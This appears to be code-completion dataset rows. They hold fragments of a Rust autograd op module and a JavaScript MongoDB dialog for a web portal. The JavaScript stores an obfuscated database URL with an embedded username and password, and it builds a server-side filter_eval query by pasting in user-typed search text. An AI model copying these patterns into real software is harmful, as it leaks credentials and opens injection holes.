OpError::OutOfBounds(s) => write!(f, "{}: ", s),
}
}
}
/// Trait for tensor operations. `Tensor` structs wrap this.
pub trait Op<F: Float> {
/// Name of this op
fn name(&self) -> &'static str {
type_name::<Self>()
}
/// Runs this op with `ComputeContext`.
fn compute(&self, ctx: &mut ComputeContext<F>) -> Result<(), OpError>;
/// Returns gradients for input nodes by use of output's gradients etc.
fn grad(&self, ctx: &mut GradientContext<F>);
}
pub(crate) struct DummyOp<F: Float> {
pub phantom: PhantomData<F>,
}
impl<F: Float> DummyOp<F> {
#[allow(dead_code)]
pub(crate) fn new() -> Self {
DummyOp {
phantom: PhantomData,
}
}
}
impl<F: Float> Op<F> for DummyOp<F> {
fn compute(&self, _: &mut ComputeContext<F>) -> Result<(), OpError> {
Ok(())
}
fn grad(&self, _: &mut GradientContext<F>) {}
}
/// Wrapper for NdArrayView/NdArrayViewMut which is fed to `Op::compute`
///
/// Used in `Op::ComputeContext`.
pub(crate) enum OpInput<'v, T: Float> {
NonVariable(Option<NdArrayView<'v, T>>),
RdOnlyVariable(Option<NdArrayView<'v, T>>),
RdWrVariable(Option<NdArrayViewMut<'v, T>>),
}
/// `Op::compute`'s output
#[derive(Clone)]
pub(crate) enum OpOutput<T: Float> {
Owned(NdArray<T>),
View(RawNdArrayView<T>),
}
impl<'view, T: Float> OpInput<'view, T> {
#[inline]
/// Make a read-only input array
pub fn new_non_variable(x: NdArrayView<'view, T>) -> Self {
NonVariable(Some(x))
}
#[inline]
/// Make a read-only input array
pub fn new_rdonly_variable(x: NdArrayView<'view, T>) -> Self {
OpInput::RdOnlyVariable(Some(x))
}
#[inline]
/// Make a read/write input array
pub fn new_rdwr_variable(x: NdArrayViewMut<'view, T>) -> Self {
OpInput::RdWrVariable(Some(x))
}
}
/// Context of an `Op`'s computation phase.
///
/// # Example
///
/// ```
/// use autograd as ag;
///
/// // Implementing `Op` trait for `Sigmoid`.
/// struct Sigmoid;
///
/// impl<T: ag::Float> ag::op::Op<T> for Sigmoid {
/// fn compute(
/// &self,
/// ctx: &mut ag::op::ComputeContext<T>,
/// ) -> Result<(), ag::op::OpError> {
/// // Getting the first input array.
/// let x: &ag::NdArrayView<_> = &ctx.input(0);
/// let half = T::from(0.5).unwrap();
/// let y = x.mapv(move |a| ((a * half).tanh() * half) + half);
/// // Put the computed result.
/// ctx.append_output(y);
/// Ok(())
/// }
///
/// fn grad(&self, ctx: &mut ag::op::GradientContext<T>) { /* ... */ }
/// }
/// ```
pub struct ComputeContext<'v, T: Float> {
// Input arrays
xs: SmallVec<OpInput<'v, T>>,
// Output arrays
pub(crate) ys: SmallVec<OpOutput<T>>,
}
impl<'graph, 'view, T: Float> ComputeContext<'view, T> {
#[inline]
pub(crate) fn new(xs: SmallVec<OpInput<'view, T>>) -> Self {
ComputeContext {
xs,
ys: SmallVec::new(),
}
}
/// Grabs the `i` th input array as a *read-only* array view.
///
/// Calling `input(i)` more than once causes panic.
#[inline]
pub fn input(&mut self, i: usize) -> NdArrayView<'view, T> {
let x = match self.xs.get_mut(i) {
Some(x) => x,
None => panic!("Bad op impl: input index out of range."),
};
match x {
NonVariable(ref mut a) => match a.take() {
Some(ret) => ret,
None => panic!(
"Bad op impl: input({})/input_mut({}) cannot be called twice",
i, i
),
},
OpInput::RdOnlyVariable(ref mut a) => match a.take() {
Some(ret) => ret,
None => panic!(
"Bad op impl: input({})/input_mut({}) cannot be called twice",
i, i
),
},
OpInput::RdWrVariable(_) => {
panic!(
"Bad op impl: cannot perform mutable borrowing for input({}). Use input_mut() instead.",
i
);
}
}
}
/// Grabs the `i` th input array as a *read-write* array view.
///
/// Calling `input_mut(i)` more than once causes panic.
#[inline]
pub fn input_mut(&mut self, i: usize) -> NdArrayViewMut<'view, T> {
let x = match self.xs.get_mut(i) {
Some(x) => x,
None => panic!("Bad op impl: {}'s input doesn't exist.", i),
};
match x {
OpInput::RdWrVariable(ref mut a) => match a.take() {
Some(ret) => ret,
None => panic!(
"Bad op impl: input({})/input_mut({}) cannot be called twice",
i, i
),
},
_ => {
panic!(
"Bad op impl: cannot perform mutable borrowing for input({})",
i
);
}
}
}
/// Appends an `ndarray::ArrayView` to the back of the output list of the current op.
///
/// NOTE: Implementor of `Op::compute` must not forget to call `append_*` as many as the number of its output in `Op::compute`, otherwise panic occurs.
#[inline]
pub fn append_output_view(&mut self, y: NdArrayView<'view, T>) {
self.append_output_view_raw(y.raw_view());
}
/// Appends an `ndarray::ArrayView` to the back of the output list of the current op.
///
/// NOTE: Implementor of `Op::compute` must not forget to call `append_*` as many as the number of its output in `Op::compute`, otherwise panic occurs.
#[inline]
pub(crate) fn append_output_view_raw(&mut self, y: RawNdArrayView<T>) {
let mut contains_variable_input= false;
for x in &self.xs {
match x {
NonVariable(_) => {},
_ => contains_variable_input = true
}
}
if contains_variable_input {
// copy it beforehand to avoid use-after-free
self.ys.push(OpOutput::Owned(unsafe { y.deref_into_view().to_owned() }));
} else {
self.ys.push(OpOutput::View(y));
}
}
#[inline]
pub fn append_empty_output(&mut self) {
self.ys.push(OpOutput::Owned(NdArray::zeros(
crate::ndarray::IxDyn(&[]),
)));
}
/// Appends an ndarray to the back of the output list of the current op.
///
/// NOTE: Implementor of `Op::compute` must not forget to call `append_*` as many as the number of its output in `Op::compute`, otherwise panic occurs.
#[inline]
pub fn append_output(&mut self, y: NdArray<T>) {
self.ys.push(OpOutput::Owned(y));
}
/// Returns a number of input arrays.
#[inline]
pub fn num_inputs(&self) -> usize {
self.xs.len()
}
}
/// Context of an `Op`'s gradient propagation phase.
///
/// This is passed to an `Op` through `Op::grad`.
/// `Op::grad` should provide the gradients of its inputs by calling `GradientContext::append_input_grad`.
///
/// Use `graph()` to access `Graph` object for tensor computations.
///
/// ```
/// use autograd as ag;
/// use ag::tensor_ops as T;
///
/// struct Sigmoid;
///
/// impl<F: ag::Float> ag::op::Op<F> for Sigmoid {
/// fn compute(&self, ctx: &mut ag::op::ComputeContext<F>) -> Result<(), ag::op::OpError> {
/// /* ... */
/// Ok(())
/// }
///
/// fn grad(&self, ctx: &mut ag::op::GradientContext<F>) {
/// // gradient of the input of Sigmoid
/// let gy = ctx.output_grad();
/// // output tensor
/// let y = ctx.output();
/// // `Tensor` computations
/// let gx = gy * (y - T::square(y));
/// // Propagates input's gradient.
/// ctx.append_input_grad(Some(gx));
/// }
/// }
/// ```
pub struct GradientContext<'graph, T: Float> {
gy: Tensor<'graph, T>,
y: Tensor<'graph, T>,
graph: &'graph crate::graph::Graph<T>,
gxs: SmallVec<Option<Tensor<'graph, T>>>,
}
impl<'graph, T: Float> GradientContext<'graph, T> {
#[inline]
pub(crate) fn new(
gy: Tensor<'graph, T>,
y: Tensor<'graph, T>,
graph: &'graph crate::graph::Graph<T>,
) -> Self {
GradientContext {
gy,
y,
graph,
gxs: SmallVec::new(),
}
}
// Call Op::grad and return `gxs`
pub(crate) fn compute_input_grads(mut self) -> SmallVec<Option<Tensor<'graph, T>>> {
let id = self.y.id;
// steal op
let stolen = self.graph().access_inner_mut(id).op.take().unwrap();
// call Op::grad
stolen.grad(&mut self);
// restore
mem::swap(&mut self.graph().access_inner_mut(id).op, &mut Some(stolen));
debug_assert!(
!self.gxs.is_empty(),
"Bad Op impl: GradientContext::append_input_grad was not called"
);
self.gxs
}
/// Returns the gradient of the op's output.
#[inline]
pub fn output_grad(&self) -> Tensor<'graph, T> {
self.gy
}
/// Grabs the output of the op.
#[inline]
pub fn output(&self) -> Tensor<'graph, T> {
self.y
}
/// Returns input tensors.
#[inline]
pub fn inputs(&self) -> SmallVec<Tensor<'graph, T>> {
let mut ret = SmallVec::new();
for input in self.y.get_incoming_tensors().iter() {
ret.push(self.graph.tensor(input.id));
}
ret
}
/// Grabs the `i` th input tensor.
#[inline]
pub fn input(&self, i: usize) -> Tensor<'graph, T> {
return self
.y
.get_incoming_tensor(i, self.graph)
.expect("bad Op::grad impl");
}
/// Returns the number of inputs.
#[inline]
pub fn num_inputs(&self) -> usize {
self.y.inner().incoming_nodes.len()
}
/// Returns a graph object that is usable for tensor computations in the context.
#[inline]
pub fn graph(&self) -> &'graph crate::graph::Graph<T> {
self.graph
}
/// Back-propagates the input's gradient.
///
/// Appends the given tensor to the back of the input-gradient-list.
/// `None` argument indicates that the `Op`'s input doesn't have gradient.
/// Note that `Op::grad` must call this function as many as `num_inputs()`.
#[inline]
pub fn append_input_grad(&mut self, gx: Option<Tensor<'graph, T>>) {
self.gxs.push(gx);
}
}
| OpError | identifier_name |
op.rs | //! # Implementing differentiable operations
//!
//! Many of well-known ops are pre-defined in [crate::tensor_ops], but you can also
//! implement custom ops by hand.
//! See also [crate::tensor::TensorBuilder].
//!
//! ```
//! use ndarray;
//! use autograd as ag;
//! use autograd::op::OpError;
//! use autograd::tensor_ops::*;
//!
//! type NdArray<T: ag::Float> = ndarray::Array<T, ndarray::IxDyn>;
//!
//! // Implements `Op` trait for `Sigmoid`.
//! struct Sigmoid;
//!
//! impl<T: ag::Float> ag::op::Op<T> for Sigmoid {
//! fn compute(
//! &self,
//! ctx: &mut ag::op::ComputeContext<T>,
//! ) -> Result<(), OpError> {
//! let x: &ag::NdArrayView<_> = &ctx.input(0);
//! // Use `ndarray::Array::mapv` for element-wise computation.
//! let half = T::from(0.5).unwrap();
//! let y = x.mapv(move |a| ((a * half).tanh() * half) + half);
//! ctx.append_output(y);
//! Ok(())
//! }
//!
//! fn grad(&self, ctx: &mut ag::op::GradientContext<T>) {
//! // gradient of the output of Sigmoid
//! let gy = ctx.output_grad();
//! let y = ctx.output();
//! // gradient of the input of Sigmoid
//! let gx = gy * (y - square(y));
//! ctx.append_input_grad(Some(gx));
//! }
//! }
//!
//! // `sigmoid` function for end-user.
//! fn sigmoid<'graph, F: ag::Float>(x: &ag::Tensor<'graph, F>, g: &'graph ag::Context<F>)
//! -> ag::Tensor<'graph, F> {
//! ag::Tensor::builder(g)
//! .append_input(x, false)
//! .build(Sigmoid)
//! }
//! ```
//!
use std::any::type_name;
use std::fmt;
use std::marker::PhantomData;
use std::mem;
use crate::ndarray_ext::{NdArrayView, NdArrayViewMut, RawNdArrayView};
use crate::smallvec::SmallVec as RawSmallVec;
use crate::tensor::Tensor;
use crate::{Float, NdArray};
use crate::op::OpInput::NonVariable;
pub(crate) const DEFAULT_NUM_EDGES: usize = 2;
pub(crate) type SmallVec<T> = RawSmallVec<[T; DEFAULT_NUM_EDGES]>;
/// Error in `Op`'s computation.
#[derive(Clone, Debug, PartialEq)]
pub enum OpError {
NdArrayError(String, ndarray::ShapeError),
IncompatibleShape(String),
TypeUnsupported(String),
InvalidDims(String),
OutOfBounds(String),
}
impl std::error::Error for OpError {}
impl fmt::Display for OpError {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
OpError::NdArrayError(pref, e) => write!(f, "{}: ", pref).and_then(|()| e.fmt(f)),
OpError::IncompatibleShape(s) => write!(f, "{}: ", s),
OpError::TypeUnsupported(s) => write!(f, "{}: ", s),
OpError::InvalidDims(s) => write!(f, "{}: ", s),
OpError::OutOfBounds(s) => write!(f, "{}: ", s),
}
}
}
/// Trait for tensor operations. `Tensor` structs wrap this.
pub trait Op<F: Float> {
/// Name of this op
fn name(&self) -> &'static str {
type_name::<Self>()
}
/// Runs this op with `ComputeContext`.
fn compute(&self, ctx: &mut ComputeContext<F>) -> Result<(), OpError>;
/// Returns gradients for input nodes by use of output's gradients etc.
fn grad(&self, ctx: &mut GradientContext<F>);
}
pub(crate) struct DummyOp<F: Float> {
pub phantom: PhantomData<F>,
}
impl<F: Float> DummyOp<F> {
#[allow(dead_code)]
pub(crate) fn new() -> Self {
DummyOp {
phantom: PhantomData,
}
}
}
impl<F: Float> Op<F> for DummyOp<F> {
fn compute(&self, _: &mut ComputeContext<F>) -> Result<(), OpError> {
Ok(())
}
fn grad(&self, _: &mut GradientContext<F>) {}
}
/// Wrapper for NdArrayView/NdArrayViewMut which is fed to `Op::compute`
///
/// Used in `Op::ComputeContext`.
pub(crate) enum OpInput<'v, T: Float> {
NonVariable(Option<NdArrayView<'v, T>>),
RdOnlyVariable(Option<NdArrayView<'v, T>>),
RdWrVariable(Option<NdArrayViewMut<'v, T>>),
}
/// `Op::compute`'s output
#[derive(Clone)]
pub(crate) enum OpOutput<T: Float> {
Owned(NdArray<T>),
View(RawNdArrayView<T>),
}
impl<'view, T: Float> OpInput<'view, T> {
#[inline]
/// Make a read-only input array
pub fn new_non_variable(x: NdArrayView<'view, T>) -> Self {
NonVariable(Some(x))
}
#[inline]
/// Make a read-only input array
pub fn new_rdonly_variable(x: NdArrayView<'view, T>) -> Self {
OpInput::RdOnlyVariable(Some(x))
}
#[inline]
/// Make a read/write input array
pub fn new_rdwr_variable(x: NdArrayViewMut<'view, T>) -> Self {
OpInput::RdWrVariable(Some(x))
}
}
/// Context of an `Op`'s computation phase.
///
/// # Example
///
/// ```
/// use autograd as ag;
///
/// // Implementing `Op` trait for `Sigmoid`.
/// struct Sigmoid;
///
/// impl<T: ag::Float> ag::op::Op<T> for Sigmoid {
/// fn compute(
/// &self,
/// ctx: &mut ag::op::ComputeContext<T>,
/// ) -> Result<(), ag::op::OpError> {
/// // Getting the first input array.
/// let x: &ag::NdArrayView<_> = &ctx.input(0);
/// let half = T::from(0.5).unwrap();
/// let y = x.mapv(move |a| ((a * half).tanh() * half) + half);
/// // Put the computed result.
/// ctx.append_output(y);
/// Ok(())
/// }
///
/// fn grad(&self, ctx: &mut ag::op::GradientContext<T>) { /* ... */ }
/// }
/// ```
pub struct ComputeContext<'v, T: Float> {
// Input arrays
xs: SmallVec<OpInput<'v, T>>,
// Output arrays
pub(crate) ys: SmallVec<OpOutput<T>>,
}
impl<'graph, 'view, T: Float> ComputeContext<'view, T> {
#[inline]
pub(crate) fn new(xs: SmallVec<OpInput<'view, T>>) -> Self {
ComputeContext {
xs,
ys: SmallVec::new(),
}
}
/// Grabs the `i` th input array as a *read-only* array view.
///
/// Calling `input(i)` more than once causes panic.
#[inline]
pub fn input(&mut self, i: usize) -> NdArrayView<'view, T> {
let x = match self.xs.get_mut(i) {
Some(x) => x,
None => panic!("Bad op impl: input index out of range."),
};
match x {
NonVariable(ref mut a) => match a.take() {
Some(ret) => ret,
None => panic!(
"Bad op impl: input({})/input_mut({}) cannot be called twice",
i, i
),
},
OpInput::RdOnlyVariable(ref mut a) => match a.take() {
Some(ret) => ret, | i, i
),
},
OpInput::RdWrVariable(_) => {
panic!(
"Bad op impl: cannot perform mutable borrowing for input({}). Use input_mut() instead.",
i
);
}
}
}
/// Grabs the `i` th input array as a *read-write* array view.
///
/// Calling `input_mut(i)` more than once causes panic.
#[inline]
pub fn input_mut(&mut self, i: usize) -> NdArrayViewMut<'view, T> {
let x = match self.xs.get_mut(i) {
Some(x) => x,
None => panic!("Bad op impl: {}'s input doesn't exist.", i),
};
match x {
OpInput::RdWrVariable(ref mut a) => match a.take() {
Some(ret) => ret,
None => panic!(
"Bad op impl: input({})/input_mut({}) cannot be called twice",
i, i
),
},
_ => {
panic!(
"Bad op impl: cannot perform mutable borrowing for input({})",
i
);
}
}
}
/// Appends an `ndarray::ArrayView` to the back of the output list of the current op.
///
/// NOTE: Implementor of `Op::compute` must not forget to call `append_*` as many as the number of its output in `Op::compute`, otherwise panic occurs.
#[inline]
pub fn append_output_view(&mut self, y: NdArrayView<'view, T>) {
self.append_output_view_raw(y.raw_view());
}
/// Appends an `ndarray::ArrayView` to the back of the output list of the current op.
///
/// NOTE: Implementor of `Op::compute` must not forget to call `append_*` as many as the number of its output in `Op::compute`, otherwise panic occurs.
#[inline]
pub(crate) fn append_output_view_raw(&mut self, y: RawNdArrayView<T>) {
let mut contains_variable_input= false;
for x in &self.xs {
match x {
NonVariable(_) => {},
_ => contains_variable_input = true
}
}
if contains_variable_input {
// copy it beforehand to avoid use-after-free
self.ys.push(OpOutput::Owned(unsafe { y.deref_into_view().to_owned() }));
} else {
self.ys.push(OpOutput::View(y));
}
}
#[inline]
pub fn append_empty_output(&mut self) {
self.ys.push(OpOutput::Owned(NdArray::zeros(
crate::ndarray::IxDyn(&[]),
)));
}
/// Appends an ndarray to the back of the output list of the current op.
///
/// NOTE: Implementor of `Op::compute` must not forget to call `append_*` as many as the number of its output in `Op::compute`, otherwise panic occurs.
#[inline]
pub fn append_output(&mut self, y: NdArray<T>) {
self.ys.push(OpOutput::Owned(y));
}
/// Returns a number of input arrays.
#[inline]
pub fn num_inputs(&self) -> usize {
self.xs.len()
}
}
/// Context of an `Op`'s gradient propagation phase.
///
/// This is passed to an `Op` through `Op::grad`.
/// `Op::grad` should provide the gradients of its inputs by calling `GradientContext::append_input_grad`.
///
/// Use `graph()` to access `Graph` object for tensor computations.
///
/// ```
/// use autograd as ag;
/// use ag::tensor_ops as T;
///
/// struct Sigmoid;
///
/// impl<F: ag::Float> ag::op::Op<F> for Sigmoid {
/// fn compute(&self, ctx: &mut ag::op::ComputeContext<F>) -> Result<(), ag::op::OpError> {
/// /* ... */
/// Ok(())
/// }
///
/// fn grad(&self, ctx: &mut ag::op::GradientContext<F>) {
/// // gradient of the input of Sigmoid
/// let gy = ctx.output_grad();
/// // output tensor
/// let y = ctx.output();
/// // `Tensor` computations
/// let gx = gy * (y - T::square(y));
/// // Propagates input's gradient.
/// ctx.append_input_grad(Some(gx));
/// }
/// }
/// ```
pub struct GradientContext<'graph, T: Float> {
gy: Tensor<'graph, T>,
y: Tensor<'graph, T>,
graph: &'graph crate::graph::Graph<T>,
gxs: SmallVec<Option<Tensor<'graph, T>>>,
}
impl<'graph, T: Float> GradientContext<'graph, T> {
#[inline]
pub(crate) fn new(
gy: Tensor<'graph, T>,
y: Tensor<'graph, T>,
graph: &'graph crate::graph::Graph<T>,
) -> Self {
GradientContext {
gy,
y,
graph,
gxs: SmallVec::new(),
}
}
// Call Op::grad and return `gxs`
pub(crate) fn compute_input_grads(mut self) -> SmallVec<Option<Tensor<'graph, T>>> {
let id = self.y.id;
// steal op
let stolen = self.graph().access_inner_mut(id).op.take().unwrap();
// call Op::grad
stolen.grad(&mut self);
// restore
mem::swap(&mut self.graph().access_inner_mut(id).op, &mut Some(stolen));
debug_assert!(
!self.gxs.is_empty(),
"Bad Op impl: GradientContext::append_input_grad was not called"
);
self.gxs
}
/// Returns the gradient of the op's output.
#[inline]
pub fn output_grad(&self) -> Tensor<'graph, T> {
self.gy
}
/// Grabs the output of the op.
#[inline]
pub fn output(&self) -> Tensor<'graph, T> {
self.y
}
/// Returns input tensors.
#[inline]
pub fn inputs(&self) -> SmallVec<Tensor<'graph, T>> {
let mut ret = SmallVec::new();
for input in self.y.get_incoming_tensors().iter() {
ret.push(self.graph.tensor(input.id));
}
ret
}
/// Grabs the `i` th input tensor.
#[inline]
pub fn input(&self, i: usize) -> Tensor<'graph, T> {
return self
.y
.get_incoming_tensor(i, self.graph)
.expect("bad Op::grad impl");
}
/// Returns the number of inputs.
#[inline]
pub fn num_inputs(&self) -> usize {
self.y.inner().incoming_nodes.len()
}
/// Returns a graph object that is usable for tensor computations in the context.
#[inline]
pub fn graph(&self) -> &'graph crate::graph::Graph<T> {
self.graph
}
/// Back-propagates the input's gradient.
///
/// Appends the given tensor to the back of the input-gradient-list.
/// `None` argument indicates that the `Op`'s input doesn't have gradient.
/// Note that `Op::grad` must call this function as many as `num_inputs()`.
#[inline]
pub fn append_input_grad(&mut self, gx: Option<Tensor<'graph, T>>) {
self.gxs.push(gx);
}
} | None => panic!(
"Bad op impl: input({})/input_mut({}) cannot be called twice", | random_line_split |
de.sc.portal.env.dlg.mongo.js | de.sc.portal.env.dlg.mongo = {};
de.sc.portal.env.dlg.mongo.mu = "104P116D116O112Q58H47L47M115T101E110H45Y115L111D97Y45I115S97C108R101V115J58W115I99S52U119G111R114J108P100N64F109G99Y104U112T51N54L51H97U46C103J108D111U98Q97M108H45T105K110V116N114K97T46N110C101R116H58E50T56X48N49A55D47";
de.sc.portal.env.dlg.mongo.dlg_height_original = 0;
de.sc.portal.env.dlg.mongo.div_height_original = 0;
de.sc.portal.env.dlg.mongo.tbl = null;
de.sc.portal.env.dlg.mongo.plot = null;
de.sc.portal.env.dlg.mongo.onDlgOpen = function()
{
if(de.sc.portal.env.dlg.mongo.dlg_height_original === 0)
{
var tbar = $(".ui-dialog-title", $(this).parent());
tbar.html("<img src='./img/mongo2.png' style='width:7px;position:absolute;margin-top:2px;' /> "+ tbar.html()+"");
}
de.sc.portal.env.dlg.mongo.dlg_height_original = $(this).css('height').replace(/px/, '');
de.sc.portal.env.dlg.mongo.div_height_original = $("div:last-child", $(this)).css('height').replace(/px/, '');
};
de.sc.portal.env.dlg.mongo.onDlgClose = function()
{
};
de.sc.portal.env.dlg.mongo.onDlgResize = function()
{
var dlg = $(this);
var dlg_h = dlg.css('height').replace(/px/,'');
var div_h = (dlg_h * de.sc.portal.env.dlg.mongo.div_height_original) / de.sc.portal.env.dlg.mongo.dlg_height_original;
$('#dlg_mongo_tabs', dlg).css('height', div_h - 10);
var headerHeight = $('.ui-widget-header', dlg).height() * 2;
$('.mongotab', dlg).css('height', (div_h - 10) - headerHeight);
};
de.sc.portal.env.dlg.mongo.show = function(button)
{
$("#dlg_mongo").dialog('open');
$("#dlg_mongo_tabs").tabs("option", "active", -1);
$("#dlg_mongo_tabs").tabs("option", "active", 0);
};
de.sc.portal.env.dlg.mongo.isFirstTabActivated = function(ui)
{
var next = ui.newTab.prev().size();
if (next > 0)return false;
if(de.sc.portal.env.dlg.mongo.plot === null)
{
var url = de.sc.portal.env.dlg.mongo.mu.d()+"listDatabases";
$.ajax
({
url: ((window.location.href.indexOf("http") === 0) ? ("/cgi-bin/get.cgi?"+escape(url)) : "_listDatabases"), dataType:"json"
})
.success(function(jsondata)
{
var options =
{
title: 'Mongo DBs',
animate: true,
animateReplot: true,
stackSeries: true,
seriesDefaults:
{
renderer:$.jqplot.DonutRenderer, | rendererOptions:
{
showDataLabels: true,
dataLabels: 'value',
sliceMargin: 2,
startAngle: -90,
innerDiameter: 5,
ringMargin: 5,
shadow: true,
showMarker: true,
markerOptions: { show: true },
pointLabels: { show: true, location: 's' },
smooth: true,
animation: { show: true, speed: 2500 },
shadowDepth:11,
numberRows:3,
numberColumns:3,
//dataLabelThreshold:0,
dataLabels : 'percent' //‘label’, ‘value’, ‘percent’
}
},
highlighter:
{
show: false,
sizeAdjust: 7.5
},
cursor:
{
show: false,
zoom: true,
showTooltip: true
},
legend:
{
renderer: $.jqplot.DonutLegendRenderer,
//renderer: $.jqplot.EnhancedLegendRenderer,
numberRows:3,
numberColumns:3,
show: true,
placement: 'outsideGrid',
location: 'e'
},
grid:
{
background: 'white'
}
};
var data = new Array();
{
var dbs = jsondata["databases"];
var sum=0;
for(var i=0;i<dbs.length;i++)
{
var db = dbs[i];
var sizeOnDisk = de.sc.portal.env.dlg.mongo.getSizeAsReadableString(db["sizeOnDisk"]);
var size = db["empty"] ? " (is empty)" : " (size: "+sizeOnDisk+")";
var thisdata = new Array();
thisdata.push(db["name"] + (db["empty"] ? " (is empty)" : ""));
thisdata.push(db["sizeOnDisk"]);
thisdata.push(size);
data.push(thisdata);
sum += db["sizeOnDisk"];
}
options.title = options.title + " (" +de.sc.portal.env.dlg.mongo.getSizeAsReadableString(sum)+")";
}
de.sc.portal.env.dlg.mongo.plot = jQuery.jqplot ('mongodbschart', [data], options);
$('div.mongodbschart-container').resizable({delay: 20});
$('div.mongodbschart-container').bind('resize', function(event, ui)
{
de.sc.portal.env.dlg.mongo.plot.replot();
});
$('#mongodbschart').bind('jqplotDataHighlight', function (ev, seriesIndex, pointIndex, data)
{
$('#mongodbschartinfo').html(data[0]+" "+data[2]);
var mouseX = ev.pageX;
var mouseY = ev.pageY;
var o = $("#dlg_mongo").offset();
mouseX -= o.left;
mouseY -= o.top;
var cssObj =
{
position : 'absolute',
'font-weight' : 'bold',
left : mouseX + 'px',
top : mouseY + 'px',
color:'black'
};
$('#mongodbschartinfo').css(cssObj);
});
$('#mongodbschart').bind('jqplotDataUnhighlight', function (ev, seriesIndex, pointIndex, data)
{
$('#mongodbschartinfo').html("");
});
$(".jqplot-table-legend", "#dlg_mongo").css("text-align","left").css("background-color","white").css("font-size","9px");
$("table.jqplot-table-legend", "#dlg_mongo").css("top","0px");
});
}
return true;
};
de.sc.portal.env.dlg.mongo.isLastTabActivated = function(ui)
{
var next = ui.newTab.next().size();
if (next > 0)return false;
$("#cols, #fields","#dlg_mongo_tabs").html(" ");
var select = $("#dbs","#dlg_mongo_tabs");
select.next().show();
var url = de.sc.portal.env.dlg.mongo.mu.d()+"listDatabases";
$.ajax
({
url: ((window.location.href.indexOf("http") === 0) ? ("/cgi-bin/get.cgi?"+escape(url)) : "_listDatabases"), dataType:"json"
})
.success(function(data)
{
var dbs = data["databases"];
if(select.size() < 1)
{
de.sc.log("cisLastTabActivated:\n!select"+ui.newTab.html(), de.sc.ERR);
return;
}
select.html("<option></option>");
for(var i=0;i<dbs.length;i++)
{
var db = dbs[i];
var sizeOnDisk = de.sc.portal.env.dlg.mongo.getSizeAsReadableString(db["sizeOnDisk"]);
var size = db["empty"] ? " (is empty)" : " (size: "+sizeOnDisk+")";
var o = new Option(db["name"]+size, db["name"], false, false);
select[0][select[0].options.length] = o;
}
select.next().hide();
})
.error(function(xhr, statusmsg, err)
{
de.sc.log("\ncisLastTabActivated:\nstatus:'"+statusmsg+"'\nerror:'"+err+"'\nurl: '"+url+"'\nthis:'"+window.location.href+"'", de.sc.WRN);
});
return true;
};
de.sc.portal.env.dlg.mongo.getSizeAsReadableString = function(sizeAsNumber)
{
if((sizeAsNumber === null) || (sizeAsNumber === 0) || (sizeAsNumber === ""))return sizeAsNumber;
if(sizeAsNumber < 1024)
return sizeAsNumber + " bytes";
if(sizeAsNumber < 1024*1024)
return (sizeAsNumber / 1024).toFixed(2) + " kb";
if(sizeAsNumber < 1024*1024*1024)
return (sizeAsNumber / ( 1024*1024)).toFixed(2) + " mb";
if(sizeAsNumber < 1024*1024*1024*1024)
return (sizeAsNumber / ( 1024*1024*1024)).toFixed(2) + " gb";
if(sizeAsNumber < 1024*1024*1024*1024*1024)
return (sizeAsNumber / ( 1024*1024*1024*1024)).toFixed(2) + " tb";
de.sc.log("\ngetSizeAsReadableString:\nunexpected nr:"+sizeAsNumber, de.sc.WRN);
return sizeAsNumber;
};
de.sc.portal.env.dlg.mongo.onSelectCols = function(eSelect)
{
$("#fields","#dlg_mongo_tabs").html(" ");
var db = $("#dbs","#dlg_mongo_tabs")[0].options[$("#dbs","#dlg_mongo_tabs")[0].selectedIndex].value;
if(de.sc.isempty(db))return;
var col = eSelect.options[eSelect.selectedIndex].value;
if(de.sc.isempty(col))return;
var select = $("#fields","#dlg_mongo_tabs");
select.next().show();
var url = de.sc.portal.env.dlg.mongo.mu.d()+db+"/"+col+"/?limit=1";
$.ajax
({
url: ((window.location.href.indexOf("http") === 0) ? ("/cgi-bin/get_with_params.cgi?"+escape(url)) : "_items"), dataType:"json"
})
.success(function(data)
{
var item = data["rows"][0];
if (select.size() < 1)
{
de.sc.log("onSelectCols:\n!select", de.sc.ERR);
return;
}
select.html("<option></option>");
for(var attrName in item)
{
if(attrName.indexOf('_') === 0)continue;
//var attrValue = item[attrName];
var o = new Option(attrName, attrName, false, false);
select[0][select[0].options.length] = o;
}
select.next().hide();
})
.error(function(xhr, statusmsg, err)
{
select.next().hide();
de.sc.log("\nonSelectCols:\nstatus:'"+statusmsg+"'\nerror:'"+err+"'\nurl: '"+url+"'\nthis:'"+window.location.href+"'", de.sc.WRN);
});
};
de.sc.portal.env.dlg.mongo.onSearch = function(searchB)
{
var db = $("#dbs" ,"#dlg_mongo_tabs")[0].options[$("#dbs" ,"#dlg_mongo_tabs")[0].selectedIndex].value;
var col = $("#cols" ,"#dlg_mongo_tabs")[0].options[$("#cols" ,"#dlg_mongo_tabs")[0].selectedIndex].value;
var fld = $("#fields","#dlg_mongo_tabs")[0].options[$("#fields","#dlg_mongo_tabs")[0].selectedIndex].value;
if(de.sc.isempty(db) || de.sc.isempty(col))
{
alert("Please choose an entry in the above dropdowns.");
return;
}
if(!de.sc.isempty(fld) && de.sc.isempty($("#filter","#dlg_mongo_tabs")[0].value))
{
alert("Please enter a search expression for the field '"+fld+"',\nor\nclear the Field dropdown.");
return;
}
$(searchB).next().show();
if (de.sc.portal.env.dlg.mongo.tbl !== null)
de.sc.portal.env.dlg.mongo.tbl.destroy();
de.sc.portal.env.dlg.mongo.tbl = null;
$("#dlg_mongo_tabs_search_resultlist, #dlg_mongo_tabs_search_resultssummary","#dlg_mongo_tabs").html(" ");
var query = $("#filter","#dlg_mongo_tabs")[0].value;
query = de.sc.isempty(query) ? "" : "{"+fld+":/"+query+"/i}";
var url = de.sc.portal.env.dlg.mongo.mu.d()+db+"/$cmd/?filter_eval=function(){return%20db."+col+".find("+query+").limit(50).toArray()}&limit=1";
$.ajax
({
url: ((window.location.href.indexOf("http") === 0) ? ("/cgi-bin/get_with_params.cgi?"+escape(url)) : "_mongo_query_resultlist"), dataType:"json"
})
.success(function(data)
{
var hits = data["rows"][0]["retval"];
{
$("#dlg_mongo_tabs_search_resultssummary","#dlg_mongo_tabs").html(" search time: "+data["millis"]+" ms. Hits: "+hits.length);
}
if(hits.length < 1)
{
$("#dlg_mongo_tabs_search_resultlist","#dlg_mongo_tabs").html(" no hits");
$(searchB).next().hide();
return;
}
var hit = null;
var attrName = null;
{
hit = hits[0];
var ths = "";
for(attrName in hit)
{
if(attrName.indexOf('_') === 0)continue;
ths += "<th>"+attrName+"</th>";
}
